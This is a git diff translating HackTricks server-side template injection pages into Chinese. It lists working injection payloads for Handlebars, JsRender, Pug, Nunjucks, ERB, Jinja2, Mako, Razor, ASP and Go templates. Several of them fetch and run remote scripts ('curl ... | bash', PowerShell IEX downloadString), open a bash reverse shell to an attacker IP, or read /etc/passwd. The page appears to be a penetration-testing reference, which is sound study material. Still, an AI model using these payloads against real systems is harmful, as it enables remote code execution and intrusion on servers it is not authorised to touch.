+> [patTemplate](https://github.com/wernerwa/pat-template) 是一个非编译的 PHP 模板引擎，使用 XML 标签将文档分成不同部分
 ```xml
 <patTemplate:tmpl name="page">
-  This is the main page.
-  <patTemplate:tmpl name="foo">
-    It contains another template.
-  </patTemplate:tmpl>
-  <patTemplate:tmpl name="hello">
-    Hello {NAME}.<br/>
-  </patTemplate:tmpl>
+This is the main page.
+<patTemplate:tmpl name="foo">
+It contains another template.
+</patTemplate:tmpl>
+<patTemplate:tmpl name="hello">
+Hello {NAME}.<br/>
+</patTemplate:tmpl>
 </patTemplate:tmpl>
 ```
-
-**More information**
+**更多信息**
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate)
 
 ### Handlebars (NodeJS)
 
-Path Traversal (more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
-
+路径遍历（更多信息 [这里](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)）。
 ```bash
 curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
 ```
-
-- \= Error
+- \= 错误
 - ${7\*7} = ${7\*7}
-- Nothing
-
+- 无内容
 ```java
 {{#with "s" as |string|}}
-  {{#with "e"}}
-    {{#with split as |conslist|}}
-      {{this.pop}}
-      {{this.push (lookup string.sub "constructor")}}
-      {{this.pop}}
-      {{#with string.split as |codelist|}}
-        {{this.pop}}
-        {{this.push "return require('child_process').exec('whoami');"}}
-        {{this.pop}}
-        {{#each conslist}}
-          {{#with (string.sub.apply 0 codelist)}}
-            {{this}}
-          {{/with}}
-        {{/each}}
-      {{/with}}
-    {{/with}}
-  {{/with}}
+{{#with "e"}}
+{{#with split as |conslist|}}
+{{this.pop}}
+{{this.push (lookup string.sub "constructor")}}
+{{this.pop}}
+{{#with string.split as |codelist|}}
+{{this.pop}}
+{{this.push "return require('child_process').exec('whoami');"}}
+{{this.pop}}
+{{#each conslist}}
+{{#with (string.sub.apply 0 codelist)}}
+{{this}}
+{{/with}}
+{{/each}}
+{{/with}}
+{{/with}}
+{{/with}}
 {{/with}}
 
 URLencoded:
 %7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D
 ```
-
-**More information**
+**更多信息**
 
 - [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
 
 ### JsRender (NodeJS)
 
-| **Template** | **Description**                         |
+| **模板** | **描述**                         |
 | ------------ | --------------------------------------- |
-|              | Evaluate and render output              |
-|              | Evaluate and render HTML encoded output |
-|              | Comment                                 |
-| and          | Allow code (disabled by default)        |
+|              | 评估并渲染输出              |
+|              | 评估并渲染HTML编码输出 |
+|              | 注释                                 |
+| 和          | 允许代码（默认禁用）        |
 
 - \= 49
 
-**Client Side**
-
+**客户端**
 ```python
 {{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
 ```
-
-**Server Side**
-
+**服务器端**
 ```bash
 {{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
 ```
-
-**More information**
+**更多信息**
 
 - [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
 
@@ -781,52 +705,48 @@ URLencoded:
 - `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
 - `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
 
-**Example server side render**
-
+**示例服务器端渲染**
 ```javascript
 var pugjs = require("pug")
 home = pugjs.render(injected_page)
 ```
-
-**More information**
+**更多信息**
 
 - [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/)
 
 ### NUNJUCKS (NodeJS) <a href="#nunjucks" id="nunjucks"></a>
 
 - \{{7\*7\}} = 49
-- \{{foo\}} = No output
+- \{{foo\}} = 无输出
 - \#{7\*7} = #{7\*7}
-- \{{console.log(1)\}} = Error
-
+- \{{console.log(1)\}} = 错误
 ```javascript
 {
-  {
-    range.constructor(
-      "return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')"
-    )()
-  }
+{
+range.constructor(
+"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')"
+)()
+}
 }
 {
-  {
-    range.constructor(
-      "return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')"
-    )()
-  }
+{
+range.constructor(
+"return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')"
+)()
+}
 }
 ```
-
-**More information**
+**更多信息**
 
 - [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine)
 
-### Other NodeJS
+### 其他 NodeJS
 
 <figure><img src="../../images/image (1) (1).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:640/format:webp/1*J4gQBzN8Gbj0CkgSLLhigQ.jpeg">https://miro.medium.com/v2/resize:fit:640/format:webp/1*J4gQBzN8Gbj0CkgSLLhigQ.jpeg</a></p></figcaption></figure>
 
 <figure><img src="../../images/image (1) (1) (1).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:640/format:webp/1*jj_-oBi3gZ6UNTvkBogA6Q.jpeg">https://miro.medium.com/v2/resize:fit:640/format:webp/1*jj_-oBi3gZ6UNTvkBogA6Q.jpeg</a></p></figcaption></figure>
 
-- More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
+- 更多信息在 [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
 
 ### ERB (Ruby)
 
@@ -834,7 +754,6 @@ home = pugjs.render(injected_page)
 - `${7*7} = ${7*7}`
 - `<%= 7*7 %> = 49`
 - `<%= foobar %> = Error`
-
 ```python
 <%= system("whoami") %> #Execute code
 <%= Dir.entries('/') %> #List folder
@@ -846,34 +765,31 @@ home = pugjs.render(injected_page)
 <% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
 <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
 ```
-
-**More information**
+**更多信息**
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
 
 ### Slim (Ruby)
 
 - `{ 7 * 7 }`
-
 ```
 { %x|env| }
 ```
-
-**More information**
+**更多信息**
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
 
-### Other Ruby
+### 其他 Ruby
 
 <figure><img src="../../images/image (4).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:640/format:webp/1*VeZvEGI6rBP_tH-V0TqAjQ.jpeg">https://miro.medium.com/v2/resize:fit:640/format:webp/1*VeZvEGI6rBP_tH-V0TqAjQ.jpeg</a></p></figcaption></figure>
 
 <figure><img src="../../images/image (5).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:640/format:webp/1*m-iSloHPqRUriLOjpqpDgg.jpeg">https://miro.medium.com/v2/resize:fit:640/format:webp/1*m-iSloHPqRUriLOjpqpDgg.jpeg</a></p></figcaption></figure>
 
-- More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
+- 更多信息请访问 [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
 
 ### Python
 
-Check out the following page to learn tricks about **arbitrary command execution bypassing sandboxes** in python:
+查看以下页面以了解关于 **绕过沙箱的任意命令执行** 的技巧：
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
@@ -885,7 +801,6 @@ Check out the following page to learn tricks about **arbitrary command execution
 - `${7*7} = ${7*7}`
 - `{{foobar}} = Error`
 - `{{7*'7'}} = 7777777`
-
 ```python
 {% raw %}
 {% import foobar %} = Error
@@ -903,20 +818,19 @@ Check out the following page to learn tricks about **arbitrary command execution
 {{os.system('whoami')}}
 {{os.system('whoami')}}
 ```
-
-**More information**
+**更多信息**
 
 - [https://ajinabraham.com/blog/server-side-template-injection-in-tornado](https://ajinabraham.com/blog/server-side-template-injection-in-tornado)
 
 ### Jinja2 (Python)
 
-[Official website](http://jinja.pocoo.org)
+[官方网站](http://jinja.pocoo.org)
 
-> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
+> Jinja2 是一个功能齐全的 Python 模板引擎。它具有完整的 Unicode 支持、可选的集成沙箱执行环境，广泛使用并且是 BSD 许可的。
 
-- `{{7*7}} = Error`
+- `{{7*7}} = 错误`
 - `${7*7} = ${7*7}`
-- `{{foobar}} Nothing`
+- `{{foobar}} 无`
 - `{{4*4}}[[5*5]]`
 - `{{7*'7'}} = 7777777`
 - `{{config}}`
@@ -924,7 +838,6 @@ Check out the following page to learn tricks about **arbitrary command execution
 - `{{settings.SECRET_KEY}}`
 - `{{settings}}`
 - `<div data-gb-custom-block data-tag="debug"></div>`
-
 ```python
 {% raw %}
 {% debug %}
@@ -940,26 +853,22 @@ Check out the following page to learn tricks about **arbitrary command execution
 {{4*4}}[[5*5]]
 {{7*'7'}} would result in 7777777
 ```
-
-**Jinja2 - Template format**
-
+**Jinja2 - 模板格式**
 ```python
 {% raw %}
 {% extends "layout.html" %}
 {% block body %}
-  <ul>
-  {% for user in users %}
-    <li><a href="{{ user.url }}">{{ user.username }}</a></li>
-  {% endfor %}
-  </ul>
+<ul>
+{% for user in users %}
+<li><a href="{{ user.url }}">{{ user.username }}</a></li>
+{% endfor %}
+</ul>
 {% endblock %}
 {% endraw %}
 
 
 ```
-
-[**RCE not dependant from**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:
-
+[**RCE 不依赖于**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:
 ```python
 {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
 {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
@@ -970,17 +879,15 @@ Check out the following page to learn tricks about **arbitrary command execution
 {{ joiner.__init__.__globals__.os.popen('id').read() }}
 {{ namespace.__init__.__globals__.os.popen('id').read() }}
 ```
-
-**More details about how to abuse Jinja**:
+**关于如何滥用 Jinja 的更多细节**:
 
 {{#ref}}
 jinja2-ssti.md
 {{#endref}}
 
-Other payloads in [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
+其他有效载荷在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
 
 ### Mako (Python)
-
 ```python
 <%
 import os
@@ -988,35 +895,34 @@ x=os.popen('id').read()
 %>
 ${x}
 ```
-
-**More information**
+**更多信息**
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako)
 
-### Other Python
+### 其他 Python
 
 <figure><img src="../../images/image (2) (1).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:640/format:webp/1*3RO051EgizbEer-mdHD8Kg.jpeg">https://miro.medium.com/v2/resize:fit:640/format:webp/1*3RO051EgizbEer-mdHD8Kg.jpeg</a></p></figcaption></figure>
 
 <figure><img src="../../images/image (3) (1).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:640/format:webp/1*GY1Tij_oecuDt4EqINNAwg.jpeg">https://miro.medium.com/v2/resize:fit:640/format:webp/1*GY1Tij_oecuDt4EqINNAwg.jpeg</a></p></figcaption></figure>
 
-- More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
+- 更多信息在 [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
 
 ### Razor (.Net)
 
-- `@(2+2) <= Success`
-- `@() <= Success`
-- `@("{{code}}") <= Success`
-- `@ <=Success`
-- `@{} <= ERROR!`
-- `@{ <= ERRROR!`
+- `@(2+2) <= 成功`
+- `@() <= 成功`
+- `@("{{code}}") <= 成功`
+- `@ <= 成功`
+- `@{} <= 错误!`
+- `@{ <= 错误!`
 - `@(1+2)`
-- `@( //C#Code )`
+- `@( //C#代码 )`
 - `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
 - `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
 
-The .NET `System.Diagnostics.Process.Start` method can be used to start any process on the server and thus create a webshell. You can find a vulnerable webapp example in [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)
+.NET `System.Diagnostics.Process.Start` 方法可以用来在服务器上启动任何进程，从而创建 webshell。你可以在 [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp) 找到一个易受攻击的 webapp 示例。
 
-**More information**
+**更多信息**
 
 - [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](<https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/>)
 - [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)
@@ -1025,90 +931,84 @@ The .NET `System.Diagnostics.Process.Start` method can be used to start any proc
 
 - `<%= 7*7 %>` = 49
 - `<%= "foo" %>` = foo
-- `<%= foo %>` = Nothing
+- `<%= foo %>` = 无
 - `<%= response.write(date()) %>` = \<Date>
-
 ```xml
 <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
 ```
-
-**More Information**
+**更多信息**
 
 - [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp)
 
 ### Mojolicious (Perl)
 
-Even if it's perl it uses tags like ERB in Ruby.
+即使是 Perl，它也使用像 Ruby 中的 ERB 这样的标签。
 
 - `<%= 7*7 %> = 49`
 - `<%= foobar %> = Error`
-
 ```
 <%= perl code %>
 <% perl code %>
 ```
-
 ### SSTI in GO
 
-In Go's template engine, confirmation of its usage can be done with specific payloads:
+在 Go 的模板引擎中，可以通过特定的有效载荷确认其使用：
 
-- `{{ . }}`: Reveals the data structure input. For instance, if an object with a `Password` attribute is passed, `{{ .Password }}` could expose it.
-- `{{printf "%s" "ssti" }}`: Expected to display the string "ssti".
-- `{{html "ssti"}}`, `{{js "ssti"}}`: These payloads should return "ssti" without appending "html" or "js". Further directives can be explored in the Go documentation [here](https://golang.org/pkg/text/template).
+- `{{ . }}`：揭示数据结构输入。例如，如果传递了一个具有 `Password` 属性的对象，`{{ .Password }}` 可能会暴露它。
+- `{{printf "%s" "ssti" }}`：预计显示字符串 "ssti"。
+- `{{html "ssti"}}`，`{{js "ssti"}}`：这些有效载荷应返回 "ssti"，而不附加 "html" 或 "js"。可以在 Go 文档中进一步探索指令 [here](https://golang.org/pkg/text/template)。
 
 <figure><img src="../../images/image (8).png" alt="" width="375"><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rWpWndkQ7R6FycrgZm4h2A.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rWpWndkQ7R6FycrgZm4h2A.jpeg</a></p></figcaption></figure>
 
 **XSS Exploitation**
 
-With the `text/template` package, XSS can be straightforward by inserting the payload directly. Contrastingly, the `html/template` package encodes the response to prevent this (e.g., `{{"<script>alert(1)</script>"}}` results in `&lt;script&gt;alert(1)&lt;/script&gt;`). Nonetheless, template definition and invocation in Go can bypass this encoding: \{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}
+使用 `text/template` 包，XSS 可以通过直接插入有效载荷来实现。相反，`html/template` 包对响应进行编码以防止这种情况（例如，`{{"<script>alert(1)</script>"}}` 结果为 `&lt;script&gt;alert(1)&lt;/script&gt;`）。然而，在 Go 中，模板定义和调用可以绕过这种编码：\{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}
 
 vbnet Copy code
 
 **RCE Exploitation**
 
-RCE exploitation differs significantly between `html/template` and `text/template`. The `text/template` module allows calling any public function directly (using the “call” value), which is not permitted in `html/template`. Documentation for these modules is available [here for html/template](https://golang.org/pkg/html/template/) and [here for text/template](https://golang.org/pkg/text/template/).
-
-For RCE via SSTI in Go, object methods can be invoked. For example, if the provided object has a `System` method executing commands, it can be exploited like `{{ .System "ls" }}`. Accessing the source code is usually necessary to exploit this, as in the given example:
+RCE 利用在 `html/template` 和 `text/template` 之间有显著差异。`text/template` 模块允许直接调用任何公共函数（使用 “call” 值），而在 `html/template` 中不允许。有关这些模块的文档可在 [here for html/template](https://golang.org/pkg/html/template/) 和 [here for text/template](https://golang.org/pkg/text/template/) 中找到。
 
+通过 SSTI 在 Go 中进行 RCE，可以调用对象方法。例如，如果提供的对象具有执行命令的 `System` 方法，可以像 `{{ .System "ls" }}` 一样利用它。通常需要访问源代码才能进行利用，如给定的示例所示：
 ```go
 func (p Person) Secret (test string) string {
-	out, _ := exec.Command(test).CombinedOutput()
-	return string(out)
+out, _ := exec.Command(test).CombinedOutput()
+return string(out)
 }
 ```
-
-**More information**
+**更多信息**
 
 - [https://blog.takemyhand.xyz/2020/06/ssti-breaking-gos-template-engine-to](https://blog.takemyhand.xyz/2020/06/ssti-breaking-gos-template-engine-to)
 - [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
 
-### More Exploits
+### 更多漏洞
 
-Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) for more exploits. Also you can find interesting tags information in [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
+查看 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) 的其余部分以获取更多漏洞。您还可以在 [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI) 找到有趣的标签信息。
 
 ## BlackHat PDF
 
 {% file src="../../images/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15 (1).pdf" %}
 
-## Related Help
+## 相关帮助
 
-If you think it could be useful, read:
+如果您认为这可能有用，请阅读：
 
 - [Flask tricks](../../network-services-pentesting/pentesting-web/flask.md)
 - [Python magic functions](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md)
 
-## Tools
+## 工具
 
 - [https://github.com/Hackmanit/TInjA](https://github.com/Hackmanit/TInjA)
 - [https://github.com/vladko312/sstimap](https://github.com/vladko312/sstimap)
 - [https://github.com/epinna/tplmap](https://github.com/epinna/tplmap)
 - [https://github.com/Hackmanit/template-injection-table](https://github.com/Hackmanit/template-injection-table)
 
-## Brute-Force Detection List
+## 暴力破解检测列表
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
 
-## Practice & References
+## 实践与参考
 
 - [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
 - [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
@@ -1116,9 +1016,8 @@ If you think it could be useful, read:
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**，是各个学科技术和网络安全专业人士的一个热烈交流点。
 
 {% embed url="https://www.rootedcon.com/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
index c4870ee7a..deaef35fd 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
@@ -1,84 +1,77 @@
-# EL - Expression Language
+# EL - 表达式语言
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Bsic Info
+## 基本信息
 
-Expression Language (EL) is integral in JavaEE for bridging the presentation layer (e.g., web pages) and application logic (e.g., managed beans), enabling their interaction. It's predominantly used in:
+表达式语言 (EL) 是 JavaEE 中的重要组成部分，用于连接表示层（例如，网页）和应用逻辑（例如，受管 bean），使它们能够相互作用。它主要用于：
 
-- **JavaServer Faces (JSF)**: For binding UI components to backend data/actions.
-- **JavaServer Pages (JSP)**: For data access and manipulation within JSP pages.
-- **Contexts and Dependency Injection for Java EE (CDI)**: For facilitating web layer interaction with managed beans.
+- **JavaServer Faces (JSF)**：用于将 UI 组件绑定到后端数据/操作。
+- **JavaServer Pages (JSP)**：用于在 JSP 页面中访问和操作数据。
+- **Java EE 的上下文和依赖注入 (CDI)**：用于促进 web 层与受管 bean 的交互。
 
-**Usage Contexts**:
+**使用上下文**：
 
-- **Spring Framework**: Applied in various modules like Security and Data.
-- **General Use**: Through SpEL API by developers in JVM-based languages like Java, Kotlin, and Scala.
+- **Spring 框架**：应用于安全和数据等各种模块。
+- **通用使用**：通过 SpEL API 由 JVM 语言（如 Java、Kotlin 和 Scala）中的开发人员使用。
 
-EL's is present in JavaEE technologies, standalone environments, and recognizable through `.jsp` or `.jsf` file extensions, stack errors, and terms like "Servlet" in headers. However, its features and the use of certain characters can be version-dependent.
+EL 存在于 JavaEE 技术、独立环境中，并通过 `.jsp` 或 `.jsf` 文件扩展名、堆栈错误和头部中的“Servlet”等术语可识别。然而，其特性和某些字符的使用可能依赖于版本。
 
 > [!NOTE]
-> Depending on the **EL version** some **features** might be **On** or **Off** and usually some **characters** may be **disallowed**.
+> 根据 **EL 版本**，某些 **特性** 可能是 **开启** 或 **关闭**，通常某些 **字符** 可能是 **不允许** 的。
 
-## Basic Example
+## 基本示例
 
-(You can find another interesting tutorial about EL in [https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/))
+（您可以在 [https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/) 找到另一个关于 EL 的有趣教程）
 
-Download from the [**Maven**](https://mvnrepository.com) repository the jar files:
+从 [**Maven**](https://mvnrepository.com) 仓库下载 jar 文件：
 
 - `commons-lang3-3.9.jar`
 - `spring-core-5.2.1.RELEASE.jar`
 - `commons-logging-1.2.jar`
 - `spring-expression-5.2.1.RELEASE.jar`
 
-And create a the following `Main.java` file:
-
+并创建以下 `Main.java` 文件：
 ```java
 import org.springframework.expression.Expression;
 import org.springframework.expression.ExpressionParser;
 import org.springframework.expression.spel.standard.SpelExpressionParser;
 
 public class Main {
-    public static ExpressionParser PARSER;
+public static ExpressionParser PARSER;
 
-    public static void main(String[] args) throws Exception {
-        PARSER = new SpelExpressionParser();
+public static void main(String[] args) throws Exception {
+PARSER = new SpelExpressionParser();
 
-        System.out.println("Enter a String to evaluate:");
-        java.io.BufferedReader stdin = new java.io.BufferedReader(new java.io.InputStreamReader(System.in));
-        String input = stdin.readLine();
-        Expression exp = PARSER.parseExpression(input);
-        String result = exp.getValue().toString();
-        System.out.println(result);
-    }
+System.out.println("Enter a String to evaluate:");
+java.io.BufferedReader stdin = new java.io.BufferedReader(new java.io.InputStreamReader(System.in));
+String input = stdin.readLine();
+Expression exp = PARSER.parseExpression(input);
+String result = exp.getValue().toString();
+System.out.println(result);
+}
 }
 ```
-
-Next compile the code (if you don't have `javac` installed, install `sudo apt install default-jdk`):
-
+接下来编译代码（如果您没有安装 `javac`，请安装 `sudo apt install default-jdk`）：
 ```java
 javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
 ```
-
-Execute the application with:
-
+使用以下命令执行应用程序：
 ```java
 java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main
 Enter a String to evaluate:
 {5*5}
 [25]
 ```
+注意在前面的例子中，术语 `{5*5}` 是如何被 **评估** 的。
 
-Note how in the previous example the term `{5*5}` was **evaluated**.
+## **CVE 基于的教程**
 
-## **CVE Based Tutorial**
-
-Check it in **this post:** [**https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a**](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)
+在 **这篇文章** 中查看： [**https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a**](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)
 
 ## Payloads
 
-### Basic actions
-
+### 基本操作
 ```bash
 #Basic string operations examples
 {"a".toString()}
